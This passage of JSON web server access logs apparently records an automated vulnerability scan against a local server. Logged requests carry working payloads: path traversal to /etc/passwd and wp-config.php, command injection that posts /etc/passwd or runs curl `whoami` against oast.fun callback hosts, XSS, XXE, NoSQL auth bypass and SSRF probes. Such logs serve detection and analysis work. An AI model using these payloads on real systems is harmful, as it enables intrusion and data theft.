HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"{\x0D\x0A \x22auth\x22: {\x0D\x0A \x22user\x22: {\x0D\x0A \x22$eq\x22: \x22admin\x22\x0D\x0A },\x0D\x0A \x22password\x22: [\x0D\x0A 0\x0D\x0A ]\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ioncube/loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/guestimage.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tool/view/phpinfo.view.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debug_toolbar/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmlcode/html/indexdefault.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"type=url&data=http%3A%2F%2Fc9v8h88smpv8c1ig07h07y78aes6yg5dz.oast.fun%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/ReportTemplateService.xls HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://c9v8h88smpv8c1ig07h06h36h1ofbw6ys.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20c9v8h88smpv8c1ig07h08b8fnrj8xn4g8.oast.fun) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://c9v8h88smpv8c1ig07h0hkn1e85a1jdjn.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://c9v8h88smpv8c1ig07h01ua8xqbj85br4.oast.fun)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//c9v8h88smpv8c1ig07h08zjexet84tqus.oast.funPa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl `whoami`.c9v8h88smpv8c1ig07h0iyo6jwzu54z4q.oast.fun} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.226","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://c9v8h88smpv8c1ig07h0qz9g3ys9gqgxz.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 